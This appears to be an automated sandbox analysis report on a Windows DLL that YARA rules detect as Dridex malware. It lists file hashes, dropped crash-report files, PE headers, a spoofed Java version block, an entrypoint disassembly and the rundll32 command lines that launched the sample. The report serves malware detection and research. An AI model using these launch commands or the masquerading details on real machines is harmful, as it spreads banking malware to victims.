Preview:	MDMP....... .......5.za.........................................-..........T.......8...........T..........................0................................................................................U...........B..............GenuineIntelW...........T............za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER61FD.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.50513207131416
Encrypted:	false
SSDEEP:	48:cvIwSD8zsjJgtWI9SCrWSC8BL8fm8M4JCdsCF3+q8/hxJ4SrSzd:uITf9BCaSNSJS+DWzd
MD5:	62DB1090DC907F046049B3D174C72850
SHA1:	B86FA95A97F742D777422258AE0DC34EE709AA84
SHA-256:	0DAD5DE5E468354CF7FC4D1B56604E607AE3F22C969CEA8D91E6284A8DFA4AEB
SHA-512:	8601725E29A34E25CF9AADDA7E5392CF6098C0B90B783D1542A58A764E760C886F55038A90A02EA4A0ACC2DB1786DA515485485E8398D825A94514C202786ED4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229584" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER716D.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.6979926180722007
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNigj96j86Ypk6UGgmfT3SOCprJ89bTYsf1xm:RrlsNiK9646Y66UGgmfT3SgTLfa
MD5:	513A869F0DF8F62CD0DCAA506841CB38
SHA1:	79DB8DD1D5B2EC5A6626721F2524C0726234D07A
SHA-256:	FFE0C86992CB2BCCE3EBFADC66D0949BF3F3A970AA1EE96CAFBF13D467863FE0
SHA-512:	7E92BC808B44034F2AC3A1B67998AEA34B758AB2D07CBE00CCAF06142A6186DCCB7F46289A499ACCBDF904339F104F4254F08A0690BD59ABA95AE0088147724D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7650.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.506054323545336
Encrypted:	false
SSDEEP:	48:cvIwSD8zsjJgtWI9SCrWSC8BP8fm8M4JCds7F2J+q8/haD4SrSh6d:uITf9BCaSN+JqnDDWh6d
MD5:	FFF9E77B6F3D1786A8A9DA10BAD0AF11
SHA1:	34A1EDD1AE0072362AE28415F12A7337149C04CA
SHA-256:	216D954D69EB38411EA005440CEF5C372F556E6511CEB2652D32858D8FC7C8A9
SHA-512:	24843BC93AAFDB91149990A3295A46ED7FFA1165A9FD3A7A30D6B08F83D7ED16751227F92974BB4AFE1A0569D2BC464AEDDECECB285C92EC7B40FDDE2D06EA8F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229584" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F66.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 11:53:33 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46780
Entropy (8bit):	2.080780581834969
Encrypted:	false
SSDEEP:	192:cm8v3TNgd6VO5SkbQTsY6/X35vbstTk7fysRvPZ9UuyjMUbXn:sh/45Lbest35vETk7fysRvh9UuyZ
MD5:	3252341FA4E6AAA340C86BE569B9B887
SHA1:	396413E0DF4DA5C36E2C8A2F27EB9B923BEBFD5D
SHA-256:	4235090E7060960CAEEDA542366BE61213CBEA65231CA0010CA88B3DA96091EB
SHA-512:	0DC5105CB2A5B95C823C647CF1ED4928D685CE823F7E45DA787B9CB5ED58E81291A6F538EED3421E517081218F46F42C6D36CEE2C1EB4DDD2B7BD7731AADD553
Malicious:	false
Preview:	MDMP....... .......=.za.........................................-..........T.......8...........T..........................0................................................................................U...........B..............GenuineIntelW...........T............za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9168.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.6972286046051592
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNilB6q86YpH26UGgmfTDSOCprRV89b7Csfwpm:RrlsNiD6h6Y46UGgmfTDSHC7Bfj
MD5:	35FE3F27DCF32FE4EC829F835278479E
SHA1:	D89F2546047CDDC57935D5DD124C03DCA162FB7F
SHA-256:	D412817C9BB092531DD5F4FE42AAF432F9AC71F9CDB5FBEAF0F740B040404182
SHA-512:	78F1F02C2DCFF470D48C3B5A2BFB4E6511E6B5E497BCC666CB4B05319B507B7761E7F8DE89B62C8D914413F651445A807A2313AE64E0B4226BEE383619E476BA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER97D2.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.504516774345163
Encrypted:	false
SSDEEP:	48:cvIwSD8zsjJgtWI9SCrWSC8Bys8fm8M4JCdsbFx+q8/h94SrSld:uITf9BCaSN8RJdYDWld
MD5:	727815519B03DAD3AF59D1F6118DB2A9
SHA1:	602837B2F4405F5ADB8C4CC82533B4BF068EB29D
SHA-256:	FB3093C323633B6C1A0CE189BE47004145EFCF055F0CFC0F9F1E2F0E9832F311
SHA-512:	9546B2871F163E4A55F0D28C3345C134937916AB5763B308DABF8FD91B843815B22E09EADCDEA3665EA6B4BF4EDADA7BF729AEAF5EA5F8FFAE8D192FE1929936
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229584" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.219812702838393
Encrypted:	false
SSDEEP:	12288:tmJcDpPaXSu5Pl5b9He4JpjoNPKHQh/GRH66BmjW0I2nej3Pq47Dw6:4JcDpPaXSu9l5bf+Ym/e
MD5:	B614A3B1ECD297D659BE03B0AB7C45B3
SHA1:	889FBB8C0D61ADE8295658FB48DF3E88513F028E
SHA-256:	A9F980CEF056EC64C47CF7B8CE374F1551D1BA94A263ED1F72B604B209CC83A4
SHA-512:	140296B1DE41CAEB366D0ECFAB17C43682411FB1ED7C37C4A514A6944330E4EF9115A81EAF1E1C3E88C635064BEFB785C8836B373CAB93E539BC056647574DAF
Malicious:	false
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmN..`.................................................................................................................................................................................................................................................................................................................................................-.=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.527735715021905
Encrypted:	false
SSDEEP:	384:1/FEP54XnIrnc83XTVgGQXK0XBmnQmRNovOglb:NFEx43Ac83DVgGQa0X8nQmUvP
MD5:	298C01B000B90A25B63089430DFCCF86
SHA1:	AD0E9DD2A27ADCB4619FBED9AFA634A93FBFF4D6
SHA-256:	368BFE7355199AC75CC44744FF406D8DCD3B48BF8424E55B76B6DC4ABBC230D3
SHA-512:	263A9564D1B4E3003B090EC264A2E260B4DA58DF17190332CA2DD7CFFD476BD7DC204AB2BF7A4E946C352F3DC07CBD0A261FA7D122470CFA7394CEF3D5D7EBE6
Malicious:	false
Preview:	regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmN..`.................................................................................................................................................................................................................................................................................................................................................-.=HvLE.N......U.............!......6>G.YK.................`... ..hbin................p.\..,..........nk,.M..`.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .M..`........ ........................... .......Z.......................Root........lf......Root....nk .M..`.....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.159938943426644
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
File size:	1093632
MD5:	e53a16bea7918b1f7d4c0e659febc766
SHA1:	10d4d3d7fac35f6492cda2fb04aebf46903481f0
SHA256:	212cae7b05ecbc938b3a1fda4753d119f69360165955937b836fdbc7a6d514eb
SHA512:	014561ee3d96f09222cb1187c8b0a785e59e2d7dd1d3bec234088c2c382da693acc5cee4b21252462939574c1c666da8f09e45161b0856b0b413f7b687567eb5
SSDEEP:	24576:ljsXggYiykQsMy2GSuCAaimSQws2yyq+YoWEUK6ES0wOyeSGwswWquEQq2GiMciL:+
File Content Preview:	MZ......................@........................................IZ..(4..(4..(4..z..&)4.....Z)4..Q...)4..u5..(4.....K(4..v6."(4.7....(4. ...,(4.....i(4.....Z(4..(5.f)4.Rich.(4.........................PE..L...&.ya...........!.... `...P.......K.......p.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004b90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61798526 [Wed Oct 27 16:58:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ae858e1bcf44b240b65263bbd6945db2

Entrypoint Preview

Instruction
mov eax, dword ptr [10106128h]
call eax
mov edx, eax
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 000000A8h
mov eax, dword ptr [ebp+08h]
mov dword ptr [esp+0000009Ch], 008A6C3Fh
mov byte ptr [esp+00000083h], 00000072h
mov dword ptr [esp+6Ch], 6C57D91Ch
mov dword ptr [esp+00000094h], 00000000h
mov dword ptr [esp+00000090h], 0093F6B2h
mov ecx, dword ptr [ebp+08h]
mov edx, esp
mov dword ptr [edx], ecx
mov dword ptr [esp+38h], eax
call 00007F6E60CABA82h
movzx ecx, word ptr [esp+000000A2h]
mov si, cx
mov word ptr [esp+000000A2h], B4E5h
mov byte ptr [esp+37h], al
mov dword ptr [esp+30h], ecx
mov word ptr [esp+2Eh], si
call 00007F6E60CABDFBh
mov ecx, dword ptr [esp+0000008Ch]
mov edx, ecx
add edx, DE3924BAh
mov dword ptr [esp+0000008Ch], edx
mov dword ptr [esp+70h], eax
mov eax, dword ptr [esp+30h]
add eax, eax
mov si, ax
mov word ptr [esp+000000A2h], si
mov eax, dword ptr [esp+70h]
mov edx, dword ptr [esp+00000090h]
mov edi, dword ptr [esp+00000094h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xfad60	0x5f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfae3c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x108000	0x3e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x109000	0x2a38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x705c	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dfe	0x6000	False	0.379720052083	data	4.39803113711	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0xf4032	0xf5000	False	0.135154257015	data	7.11996019927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xfc000	0xbd1c	0xb000	False	0.234153053977	data	5.69509557044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x108000	0x3e8	0x1000	False	0.119873046875	data	1.03136554304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x109000	0x2a38	0x3000	False	0.231608072917	data	5.67874721692	IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x108060	0x388	data

Imports

DLL	Import
SHELL32.dll	SHGetDesktopFolder
IPHLPAPI.DLL	GetIfTable
ADVAPI32.dll	RegOverridePredefKey
msvcrt.dll	memset
OLEAUT32.dll	VarR4FromI2
KERNEL32.dll	CreateFileW, GetModuleFileNameW
SETUPAPI.dll	SetupDiEnumDeviceInfo
USER32.dll	ShowOwnedPopups

Exports

Name	Ordinal	Address
FFRgpmdlwwWde	1	0x100fadb0

Version Infos

Description	Data
LegalCopyright	Copyright 2004
InternalName	ddlb
FileVersion	5.2.00.0
Full Version	5.2.0_00-b00
CompanyName	Sun Microsystems, Inc.
ProductName	Ddlb(EA) 2 Tsyfezyt Bidibhex Ernseqa 5.0 Urdate 6
ProductVersion	5.2.00.0
FileDescription	Java(TM) 2 Platform Standard Edition binary
OriginalFilename	ddlb.dll
Translation	0x0000 0x04b0

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6476 Parent PID: 5820

General

Start time:	04:50:24
Start date:	28/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll'
Imagebase:	0xa10000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000000.523799622.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6500 Parent PID: 6476

General

Start time:	04:50:25
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6528 Parent PID: 6476

General

Start time:	04:50:25
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.475579943.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6544 Parent PID: 6500

General

Start time:	04:50:25
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7080 Parent PID: 6476

General

Start time:	04:51:42
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000009.00000002.874852641.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7088 Parent PID: 6476

General

Start time:	04:51:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000000.697948285.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000000.716630933.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000002.758018244.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7100 Parent PID: 6476

General

Start time:	04:51:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000000.712349151.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000000.722717692.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000002.759412743.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7112 Parent PID: 6476

General

Start time:	04:51:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000002.756877122.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000000.715578502.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000000.709098090.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7124 Parent PID: 6476

General

Start time:	04:51:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000D.00000000.732486689.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000D.00000000.723436557.000000006F021000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000D.00000002.765113573.000000006F021000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5056 Parent PID: 7088

General

Start time:	04:53:08
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
Imagebase:	0x80000
File size:	434592 bytes
